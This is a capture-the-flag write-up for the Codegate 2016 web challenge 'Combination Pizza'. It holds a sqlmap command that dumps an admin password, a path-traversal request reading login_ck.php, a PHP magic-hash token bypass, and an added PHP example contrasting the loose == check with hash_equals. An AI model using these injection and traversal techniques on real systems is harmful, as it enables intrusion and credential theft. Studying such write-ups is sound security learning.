[Codegate CTF 2016] [Web 222 – Combination Pizza] Write Up

Description

http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/

Shake Shake!!

Resolution

We have a usual blog with articles and a login page. We quickly find that the article view is vulnerable to an "AND boolean-based blind" SQL injection.

After running sqlmap against the vulnerable parameter:

python sqlmap.py -u 'http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/read.php?id=??' -p id --random-agent -D blog_db -T login --dump

we could dump the login table, including the admin password:

+--------------------------------------------+--------+
| pass                                       | user   |
+--------------------------------------------+--------+
| 70e76a15da00e6301ade718cc9416f79 (adminpw) | Admin  |
+--------------------------------------------+--------+

We also need a token to log in. In the blog table we discovered a hidden article that is only enabled for Admin:

+----+-----------------------------------------+--------+----------------------+---------+------------+------------------------------------------------------------------------------------------------------+
| id | file                                    | type   | title                | writer  | datetime   | contents                                                                                             |
+----+-----------------------------------------+--------+----------------------+---------+------------+------------------------------------------------------------------------------------------------------+
| 0  | <a href="down.php?fn=poem.jpg">down</a> | hidden | Secret File          | Admin   | 2016-03-09 | <p>Once More...</p>                                                                                  |
+----+-----------------------------------------+--------+----------------------+---------+------------+------------------------------------------------------------------------------------------------------+

So the URL down.php?fn=poem.jpg lets us download poem.jpg, but also any other file we want (path traversal), for example:

down.php?fn=../login_ck.php

In this file, we find the following comparison:

if(md5("blog".$token) == '0e689047178306969035064392896674')

Because of PHP's loose comparison (==), two numeric-looking strings are compared as numbers, and any string of the form 0e<digits> evaluates to 0. So we only need to find a token whose MD5 of "blog".$token matches the following regexp:

0e[0-9]{30}

We quickly found one solution:

Found "blogAAAAUmhx" (0e746456162670701437168918944035)
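As an added example (not code from the challenge or the write-up), here is the login_ck.php comparison beside a hardened version, using the hash and token quoted above; the second hash is the one the write-up reports for "blogAAAAUmhx":

```php
<?php
// Added example, not the challenge's own code. EXPECTED is the hash quoted
// from login_ck.php above; the token is the one the write-up found.
const EXPECTED = '0e689047178306969035064392896674';

// Vulnerable form, as found in login_ck.php: == between two numeric strings.
// Any MD5 of the form 0e<digits> parses as 0 * 10^n == 0, so it "matches"
// EXPECTED even though the bytes differ. This still holds in PHP 8, which
// only changed comparisons involving non-numeric strings.
function weakTokenCheck(string $token): bool {
    return md5('blog' . $token) == EXPECTED;
}

// Hardened form: constant-time, byte-for-byte comparison, no type juggling.
// (=== would also stop the juggling; hash_equals additionally avoids a
// timing side channel.)
function strictTokenCheck(string $token): bool {
    return hash_equals(EXPECTED, md5('blog' . $token));
}

// The core of the bug, independent of MD5: two different "0e..." strings
// are equal under ==, but not under === or hash_equals.
$found = '0e746456162670701437168918944035';
var_dump($found == EXPECTED);            // bool(true)
var_dump($found === EXPECTED);           // bool(false)
var_dump(hash_equals(EXPECTED, $found)); // bool(false)

foreach (['AAAAUmhx', 'wrongtoken'] as $t) {
    printf("%-12s weak=%s strict=%s\n", $t,
        var_export(weakTokenCheck($t), true),
        var_export(strictTokenCheck($t), true));
}
```

With the reported hash, the weak check accepts AAAAUmhx while the strict check rejects it, since the real value stored in login_ck.php is never the MD5 of "blogAAAAUmhx".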

So, using the following credentials:

Username = admin
Password = adminpw
Token = AAAAUmhx

we got the flag:

good job !!!
FLAG : jjambbong_WEBHACKING!!@!

Flag : jjambbong_WEBHACKING!!@!
